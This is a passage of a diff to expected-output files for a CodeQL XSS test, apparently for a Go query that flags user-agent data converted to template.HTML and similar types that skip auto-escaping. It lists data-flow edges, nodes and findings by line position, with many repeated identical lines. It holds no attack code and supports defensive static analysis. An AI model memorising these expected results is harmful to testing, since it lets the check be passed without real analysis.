+| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | semmle.label | type conversion : JS |
+| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | semmle.label | type conversion : JS |
+| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | semmle.label | type conversion : JS |
+| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | semmle.label | type conversion : JS |
+| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | semmle.label | type conversion : JS |
+| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | semmle.label | type conversion : JS |
 | HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : string | semmle.label | type conversion : string |
 | HTMLTemplateEscapingPassthrough.go:49:23:49:37 | call to UserAgent : string | semmle.label | call to UserAgent : string |
+| HTMLTemplateEscapingPassthrough.go:49:23:49:37 | call to UserAgent : string | semmle.label | call to UserAgent : string |
 | HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d | semmle.label | d |
+| HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d | semmle.label | d |
+| HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d | semmle.label | d |
+| HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d | semmle.label | d |
+| HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d | semmle.label | d |
+| HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d | semmle.label | d |
+| HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d | semmle.label | d |
+| HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d | semmle.label | d |
+| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion | semmle.label | type conversion |
+| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | semmle.label | type conversion : JSStr |
+| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | semmle.label | type conversion : JSStr |
+| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | semmle.label | type conversion : JSStr |
+| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | semmle.label | type conversion : JSStr |
+| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | semmle.label | type conversion : JSStr |
+| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | semmle.label | type conversion : JSStr |
+| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | semmle.label | type conversion : JSStr |
 | HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : string | semmle.label | type conversion : string |
 | HTMLTemplateEscapingPassthrough.go:53:26:53:40 | call to UserAgent : string | semmle.label | call to UserAgent : string |
+| HTMLTemplateEscapingPassthrough.go:53:26:53:40 | call to UserAgent : string | semmle.label | call to UserAgent : string |
 | HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e | semmle.label | e |
+| HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e | semmle.label | e |
+| HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e | semmle.label | e |
+| HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e | semmle.label | e |
+| HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e | semmle.label | e |
+| HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e | semmle.label | e |
+| HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e | semmle.label | e |
+| HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e | semmle.label | e |
+| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion | semmle.label | type conversion |
+| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | semmle.label | type conversion : CSS |
+| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | semmle.label | type conversion : CSS |
+| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | semmle.label | type conversion : CSS |
+| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | semmle.label | type conversion : CSS |
+| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | semmle.label | type conversion : CSS |
+| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | semmle.label | type conversion : CSS |
+| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | semmle.label | type conversion : CSS |
 | HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : string | semmle.label | type conversion : string |
 | HTMLTemplateEscapingPassthrough.go:57:24:57:38 | call to UserAgent : string | semmle.label | call to UserAgent : string |
+| HTMLTemplateEscapingPassthrough.go:57:24:57:38 | call to UserAgent : string | semmle.label | call to UserAgent : string |
 | HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b | semmle.label | b |
+| HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b | semmle.label | b |
+| HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b | semmle.label | b |
+| HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b | semmle.label | b |
+| HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b | semmle.label | b |
+| HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b | semmle.label | b |
+| HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b | semmle.label | b |
+| HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b | semmle.label | b |
+| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion | semmle.label | type conversion |
+| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | semmle.label | type conversion : Srcset |
+| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | semmle.label | type conversion : Srcset |
+| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | semmle.label | type conversion : Srcset |
+| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | semmle.label | type conversion : Srcset |
+| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | semmle.label | type conversion : Srcset |
+| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | semmle.label | type conversion : Srcset |
+| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | semmle.label | type conversion : Srcset |
 | HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : string | semmle.label | type conversion : string |
 | HTMLTemplateEscapingPassthrough.go:61:27:61:41 | call to UserAgent : string | semmle.label | call to UserAgent : string |
+| HTMLTemplateEscapingPassthrough.go:61:27:61:41 | call to UserAgent : string | semmle.label | call to UserAgent : string |
 | HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f | semmle.label | f |
+| HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f | semmle.label | f |
+| HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f | semmle.label | f |
+| HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f | semmle.label | f |
+| HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f | semmle.label | f |
+| HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f | semmle.label | f |
+| HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f | semmle.label | f |
+| HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f | semmle.label | f |
+| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion | semmle.label | type conversion |
+| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | semmle.label | type conversion : URL |
+| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | semmle.label | type conversion : URL |
+| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | semmle.label | type conversion : URL |
+| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | semmle.label | type conversion : URL |
+| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | semmle.label | type conversion : URL |
+| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | semmle.label | type conversion : URL |
+| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | semmle.label | type conversion : URL |
 | HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : string | semmle.label | type conversion : string |
 | HTMLTemplateEscapingPassthrough.go:65:24:65:38 | call to UserAgent : string | semmle.label | call to UserAgent : string |
+| HTMLTemplateEscapingPassthrough.go:65:24:65:38 | call to UserAgent : string | semmle.label | call to UserAgent : string |
+| HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g | semmle.label | g |
+| HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g | semmle.label | g |
+| HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g | semmle.label | g |
+| HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g | semmle.label | g |
+| HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g | semmle.label | g |
+| HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g | semmle.label | g |
+| HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g | semmle.label | g |
 | HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g | semmle.label | g |
 | HTMLTemplateEscapingPassthrough.go:74:17:74:31 | call to UserAgent : string | semmle.label | call to UserAgent : string |
 | HTMLTemplateEscapingPassthrough.go:75:38:75:44 | escaped | semmle.label | escaped |
 | HTMLTemplateEscapingPassthrough.go:80:10:80:24 | call to UserAgent : string | semmle.label | call to UserAgent : string |
+| HTMLTemplateEscapingPassthrough.go:80:10:80:24 | call to UserAgent : string | semmle.label | call to UserAgent : string |
+| HTMLTemplateEscapingPassthrough.go:81:16:81:33 | type conversion | semmle.label | type conversion |
 | HTMLTemplateEscapingPassthrough.go:83:38:83:40 | src | semmle.label | src |
 #select
 | HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a | HTMLTemplateEscapingPassthrough.go:28:26:28:40 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a | Data from an $@ will not be auto-escaped because it was $@ to template.HTML | HTMLTemplateEscapingPassthrough.go:28:26:28:40 | call to UserAgent | untrusted source | HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion | converted |

--- a/ql/test/experimental/CWE-79/HTMLTemplateEscapingPassthrough.expected
+++ b/ql/test/experimental/CWE-79/HTMLTemplateEscapingPassthrough.expected
@@ -1,87 +1,87 @@
 edges
-| HTMLTemplateEscapingPassthrough.go:29:12:29:66 | type conversion : string | HTMLTemplateEscapingPassthrough.go:30:39:30:39 | a |
-| HTMLTemplateEscapingPassthrough.go:29:26:29:65 | call to source : string | HTMLTemplateEscapingPassthrough.go:29:12:29:66 | type conversion |
-| HTMLTemplateEscapingPassthrough.go:29:26:29:65 | call to source : string | HTMLTemplateEscapingPassthrough.go:29:12:29:66 | type conversion : string |
-| HTMLTemplateEscapingPassthrough.go:35:9:35:63 | type conversion : string | HTMLTemplateEscapingPassthrough.go:36:40:36:40 | a |
-| HTMLTemplateEscapingPassthrough.go:35:23:35:62 | call to source : string | HTMLTemplateEscapingPassthrough.go:35:9:35:63 | type conversion |
-| HTMLTemplateEscapingPassthrough.go:35:23:35:62 | call to source : string | HTMLTemplateEscapingPassthrough.go:35:9:35:63 | type conversion : string |
-| HTMLTemplateEscapingPassthrough.go:40:9:40:59 | type conversion : string | HTMLTemplateEscapingPassthrough.go:41:40:41:40 | a |
-| HTMLTemplateEscapingPassthrough.go:40:19:40:58 | call to source : string | HTMLTemplateEscapingPassthrough.go:40:9:40:59 | type conversion |
-| HTMLTemplateEscapingPassthrough.go:40:19:40:58 | call to source : string | HTMLTemplateEscapingPassthrough.go:40:9:40:59 | type conversion : string |
-| HTMLTemplateEscapingPassthrough.go:46:11:46:65 | type conversion : string | HTMLTemplateEscapingPassthrough.go:47:41:47:41 | c |
-| HTMLTemplateEscapingPassthrough.go:46:29:46:64 | call to source : string | HTMLTemplateEscapingPassthrough.go:46:11:46:65 | type conversion |
-| HTMLTemplateEscapingPassthrough.go:46:29:46:64 | call to source : string | HTMLTemplateEscapingPassthrough.go:46:11:46:65 | type conversion : string |
-| HTMLTemplateEscapingPassthrough.go:50:11:50:56 | type conversion : string | HTMLTemplateEscapingPassthrough.go:51:44:51:44 | d |
-| HTMLTemplateEscapingPassthrough.go:50:23:50:55 | call to source : string | HTMLTemplateEscapingPassthrough.go:50:11:50:56 | type conversion |
-| HTMLTemplateEscapingPassthrough.go:50:23:50:55 | call to source : string | HTMLTemplateEscapingPassthrough.go:50:11:50:56 | type conversion : string |
-| HTMLTemplateEscapingPassthrough.go:54:11:54:57 | type conversion : string | HTMLTemplateEscapingPassthrough.go:55:44:55:44 | e |
-| HTMLTemplateEscapingPassthrough.go:54:26:54:56 | call to source : string | HTMLTemplateEscapingPassthrough.go:54:11:54:57 | type conversion |
-| HTMLTemplateEscapingPassthrough.go:54:26:54:56 | call to source : string | HTMLTemplateEscapingPassthrough.go:54:11:54:57 | type conversion : string |
-| HTMLTemplateEscapingPassthrough.go:58:11:58:117 | type conversion : string | HTMLTemplateEscapingPassthrough.go:59:38:59:38 | b |
-| HTMLTemplateEscapingPassthrough.go:58:24:58:116 | call to source : string | HTMLTemplateEscapingPassthrough.go:58:11:58:117 | type conversion |
-| HTMLTemplateEscapingPassthrough.go:58:24:58:116 | call to source : string | HTMLTemplateEscapingPassthrough.go:58:11:58:117 | type conversion : string |
-| HTMLTemplateEscapingPassthrough.go:62:11:62:50 | type conversion : string | HTMLTemplateEscapingPassthrough.go:63:44:63:44 | f |
-| HTMLTemplateEscapingPassthrough.go:62:27:62:49 | call to source : string | HTMLTemplateEscapingPassthrough.go:62:11:62:50 | type conversion |
-| HTMLTemplateEscapingPassthrough.go:62:27:62:49 | call to source : string | HTMLTemplateEscapingPassthrough.go:62:11:62:50 | type conversion : string |
-| HTMLTemplateEscapingPassthrough.go:66:11:66:53 | type conversion : string | HTMLTemplateEscapingPassthrough.go:67:38:67:38 | g |
-| HTMLTemplateEscapingPassthrough.go:66:24:66:52 | call to source : string | HTMLTemplateEscapingPassthrough.go:66:11:66:53 | type conversion |
-| HTMLTemplateEscapingPassthrough.go:66:24:66:52 | call to source : string | HTMLTemplateEscapingPassthrough.go:66:11:66:53 | type conversion : string |
-| HTMLTemplateEscapingPassthrough.go:75:16:75:55 | call to source : string | HTMLTemplateEscapingPassthrough.go:76:38:76:43 | caught |
+| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : string | HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a |
+| HTMLTemplateEscapingPassthrough.go:28:26:28:40 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion |
+| HTMLTemplateEscapingPassthrough.go:28:26:28:40 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : string | HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a |
+| HTMLTemplateEscapingPassthrough.go:34:23:34:37 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion |
+| HTMLTemplateEscapingPassthrough.go:34:23:34:37 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : string | HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a |
+| HTMLTemplateEscapingPassthrough.go:39:19:39:33 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion |
+| HTMLTemplateEscapingPassthrough.go:39:19:39:33 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : string | HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c |
+| HTMLTemplateEscapingPassthrough.go:45:29:45:43 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion |
+| HTMLTemplateEscapingPassthrough.go:45:29:45:43 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : string | HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d |
+| HTMLTemplateEscapingPassthrough.go:49:23:49:37 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion |
+| HTMLTemplateEscapingPassthrough.go:49:23:49:37 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : string | HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e |
+| HTMLTemplateEscapingPassthrough.go:53:26:53:40 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion |
+| HTMLTemplateEscapingPassthrough.go:53:26:53:40 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : string | HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b |
+| HTMLTemplateEscapingPassthrough.go:57:24:57:38 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion |
+| HTMLTemplateEscapingPassthrough.go:57:24:57:38 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : string | HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f |
+| HTMLTemplateEscapingPassthrough.go:61:27:61:41 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion |
+| HTMLTemplateEscapingPassthrough.go:61:27:61:41 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : string | HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g |
+| HTMLTemplateEscapingPassthrough.go:65:24:65:38 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion |
+| HTMLTemplateEscapingPassthrough.go:65:24:65:38 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:74:16:74:30 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:75:38:75:43 | caught |
 nodes
-| HTMLTemplateEscapingPassthrough.go:29:12:29:66 | type conversion | semmle.label | type conversion |
-| HTMLTemplateEscapingPassthrough.go:29:12:29:66 | type conversion : string | semmle.label | type conversion : string |
-| HTMLTemplateEscapingPassthrough.go:29:26:29:65 | call to source : string | semmle.label | call to source : string |
-| HTMLTemplateEscapingPassthrough.go:29:26:29:65 | call to source : string | semmle.label | call to source : string |
-| HTMLTemplateEscapingPassthrough.go:30:39:30:39 | a | semmle.label | a |
-| HTMLTemplateEscapingPassthrough.go:35:9:35:63 | type conversion | semmle.label | type conversion |
-| HTMLTemplateEscapingPassthrough.go:35:9:35:63 | type conversion : string | semmle.label | type conversion : string |
-| HTMLTemplateEscapingPassthrough.go:35:23:35:62 | call to source : string | semmle.label | call to source : string |
-| HTMLTemplateEscapingPassthrough.go:35:23:35:62 | call to source : string | semmle.label | call to source : string |
-| HTMLTemplateEscapingPassthrough.go:36:40:36:40 | a | semmle.label | a |
-| HTMLTemplateEscapingPassthrough.go:40:9:40:59 | type conversion | semmle.label | type conversion |
-| HTMLTemplateEscapingPassthrough.go:40:9:40:59 | type conversion : string | semmle.label | type conversion : string |
-| HTMLTemplateEscapingPassthrough.go:40:19:40:58 | call to source : string | semmle.label | call to source : string |
-| HTMLTemplateEscapingPassthrough.go:40:19:40:58 | call to source : string | semmle.label | call to source : string |
-| HTMLTemplateEscapingPassthrough.go:41:40:41:40 | a | semmle.label | a |
-| HTMLTemplateEscapingPassthrough.go:46:11:46:65 | type conversion | semmle.label | type conversion |
-| HTMLTemplateEscapingPassthrough.go:46:11:46:65 | type conversion : string | semmle.label | type conversion : string |
-| HTMLTemplateEscapingPassthrough.go:46:29:46:64 | call to source : string | semmle.label | call to source : string |
-| HTMLTemplateEscapingPassthrough.go:46:29:46:64 | call to source : string | semmle.label | call to source : string |
-| HTMLTemplateEscapingPassthrough.go:47:41:47:41 | c | semmle.label | c |
-| HTMLTemplateEscapingPassthrough.go:50:11:50:56 | type conversion | semmle.label | type conversion |
-| HTMLTemplateEscapingPassthrough.go:50:11:50:56 | type conversion : string | semmle.label | type conversion : string |
-| HTMLTemplateEscapingPassthrough.go:50:23:50:55 | call to source : string | semmle.label | call to source : string |
-| HTMLTemplateEscapingPassthrough.go:50:23:50:55 | call to source : string | semmle.label | call to source : string |
-| HTMLTemplateEscapingPassthrough.go:51:44:51:44 | d | semmle.label | d |
-| HTMLTemplateEscapingPassthrough.go:54:11:54:57 | type conversion | semmle.label | type conversion |
-| HTMLTemplateEscapingPassthrough.go:54:11:54:57 | type conversion : string | semmle.label | type conversion : string |
-| HTMLTemplateEscapingPassthrough.go:54:26:54:56 | call to source : string | semmle.label | call to source : string |
-| HTMLTemplateEscapingPassthrough.go:54:26:54:56 | call to source : string | semmle.label | call to source : string |
-| HTMLTemplateEscapingPassthrough.go:55:44:55:44 | e | semmle.label | e |
-| HTMLTemplateEscapingPassthrough.go:58:11:58:117 | type conversion | semmle.label | type conversion |
-| HTMLTemplateEscapingPassthrough.go:58:11:58:117 | type conversion : string | semmle.label | type conversion : string |
-| HTMLTemplateEscapingPassthrough.go:58:24:58:116 | call to source : string | semmle.label | call to source : string |
-| HTMLTemplateEscapingPassthrough.go:58:24:58:116 | call to source : string | semmle.label | call to source : string |
-| HTMLTemplateEscapingPassthrough.go:59:38:59:38 | b | semmle.label | b |
-| HTMLTemplateEscapingPassthrough.go:62:11:62:50 | type conversion | semmle.label | type conversion |
-| HTMLTemplateEscapingPassthrough.go:62:11:62:50 | type conversion : string | semmle.label | type conversion : string |
-| HTMLTemplateEscapingPassthrough.go:62:27:62:49 | call to source : string | semmle.label | call to source : string |
-| HTMLTemplateEscapingPassthrough.go:62:27:62:49 | call to source : string | semmle.label | call to source : string |
-| HTMLTemplateEscapingPassthrough.go:63:44:63:44 | f | semmle.label | f |
-| HTMLTemplateEscapingPassthrough.go:66:11:66:53 | type conversion | semmle.label | type conversion |
-| HTMLTemplateEscapingPassthrough.go:66:11:66:53 | type conversion : string | semmle.label | type conversion : string |
-| HTMLTemplateEscapingPassthrough.go:66:24:66:52 | call to source : string | semmle.label | call to source : string |
-| HTMLTemplateEscapingPassthrough.go:66:24:66:52 | call to source : string | semmle.label | call to source : string |
-| HTMLTemplateEscapingPassthrough.go:67:38:67:38 | g | semmle.label | g |
-| HTMLTemplateEscapingPassthrough.go:75:16:75:55 | call to source : string | semmle.label | call to source : string |
-| HTMLTemplateEscapingPassthrough.go:76:38:76:43 | caught | semmle.label | caught |
+| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion | semmle.label | type conversion |
+| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : string | semmle.label | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:28:26:28:40 | call to UserAgent : string | semmle.label | call to UserAgent : string |
+| HTMLTemplateEscapingPassthrough.go:28:26:28:40 | call to UserAgent : string | semmle.label | call to UserAgent : string |
+| HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion | semmle.label | type conversion |
+| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : string | semmle.label | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:34:23:34:37 | call to UserAgent : string | semmle.label | call to UserAgent : string |
+| HTMLTemplateEscapingPassthrough.go:34:23:34:37 | call to UserAgent : string | semmle.label | call to UserAgent : string |
+| HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion | semmle.label | type conversion |
+| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : string | semmle.label | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:39:19:39:33 | call to UserAgent : string | semmle.label | call to UserAgent : string |
+| HTMLTemplateEscapingPassthrough.go:39:19:39:33 | call to UserAgent : string | semmle.label | call to UserAgent : string |
+| HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion | semmle.label | type conversion |
+| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : string | semmle.label | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:45:29:45:43 | call to UserAgent : string | semmle.label | call to UserAgent : string |
+| HTMLTemplateEscapingPassthrough.go:45:29:45:43 | call to UserAgent : string | semmle.label | call to UserAgent : string |
+| HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c | semmle.label | c |
+| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion | semmle.label | type conversion |
+| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : string | semmle.label | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:49:23:49:37 | call to UserAgent : string | semmle.label | call to UserAgent : string |
+| HTMLTemplateEscapingPassthrough.go:49:23:49:37 | call to UserAgent : string | semmle.label | call to UserAgent : string |
+| HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d | semmle.label | d |
+| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion | semmle.label | type conversion |
+| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : string | semmle.label | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:53:26:53:40 | call to UserAgent : string | semmle.label | call to UserAgent : string |
+| HTMLTemplateEscapingPassthrough.go:53:26:53:40 | call to UserAgent : string | semmle.label | call to UserAgent : string |
+| HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e | semmle.label | e |
+| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion | semmle.label | type conversion |
+| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : string | semmle.label | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:57:24:57:38 | call to UserAgent : string | semmle.label | call to UserAgent : string |
+| HTMLTemplateEscapingPassthrough.go:57:24:57:38 | call to UserAgent : string | semmle.label | call to UserAgent : string |
+| HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b | semmle.label | b |
+| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion | semmle.label | type conversion |
+| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : string | semmle.label | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:61:27:61:41 | call to UserAgent : string | semmle.label | call to UserAgent : string |
+| HTMLTemplateEscapingPassthrough.go:61:27:61:41 | call to UserAgent : string | semmle.label | call to UserAgent : string |
+| HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f | semmle.label | f |
+| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion | semmle.label | type conversion |
+| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : string | semmle.label | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:65:24:65:38 | call to UserAgent : string | semmle.label | call to UserAgent : string |
+| HTMLTemplateEscapingPassthrough.go:65:24:65:38 | call to UserAgent : string | semmle.label | call to UserAgent : string |
+| HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g | semmle.label | g |
+| HTMLTemplateEscapingPassthrough.go:74:16:74:30 | call to UserAgent : string | semmle.label | call to UserAgent : string |
+| HTMLTemplateEscapingPassthrough.go:75:38:75:43 | caught | semmle.label | caught |
 #select
-| HTMLTemplateEscapingPassthrough.go:30:39:30:39 | a | HTMLTemplateEscapingPassthrough.go:29:26:29:65 | call to source : string | HTMLTemplateEscapingPassthrough.go:30:39:30:39 | a | Data from an $@ will not be auto-escaped because it was $@ to template.HTML | HTMLTemplateEscapingPassthrough.go:29:26:29:65 | call to source | untrusted source | HTMLTemplateEscapingPassthrough.go:29:12:29:66 | type conversion | converted |
-| HTMLTemplateEscapingPassthrough.go:36:40:36:40 | a | HTMLTemplateEscapingPassthrough.go:35:23:35:62 | call to source : string | HTMLTemplateEscapingPassthrough.go:36:40:36:40 | a | Data from an $@ will not be auto-escaped because it was $@ to template.HTML | HTMLTemplateEscapingPassthrough.go:35:23:35:62 | call to source | untrusted source | HTMLTemplateEscapingPassthrough.go:35:9:35:63 | type conversion | converted |
-| HTMLTemplateEscapingPassthrough.go:41:40:41:40 | a | HTMLTemplateEscapingPassthrough.go:40:19:40:58 | call to source : string | HTMLTemplateEscapingPassthrough.go:41:40:41:40 | a | Data from an $@ will not be auto-escaped because it was $@ to template.HTML | HTMLTemplateEscapingPassthrough.go:40:19:40:58 | call to source | untrusted source | HTMLTemplateEscapingPassthrough.go:40:9:40:59 | type conversion | converted |
-| HTMLTemplateEscapingPassthrough.go:47:41:47:41 | c | HTMLTemplateEscapingPassthrough.go:46:29:46:64 | call to source : string | HTMLTemplateEscapingPassthrough.go:47:41:47:41 | c | Data from an $@ will not be auto-escaped because it was $@ to template.HTMLAttr | HTMLTemplateEscapingPassthrough.go:46:29:46:64 | call to source | untrusted source | HTMLTemplateEscapingPassthrough.go:46:11:46:65 | type conversion | converted |
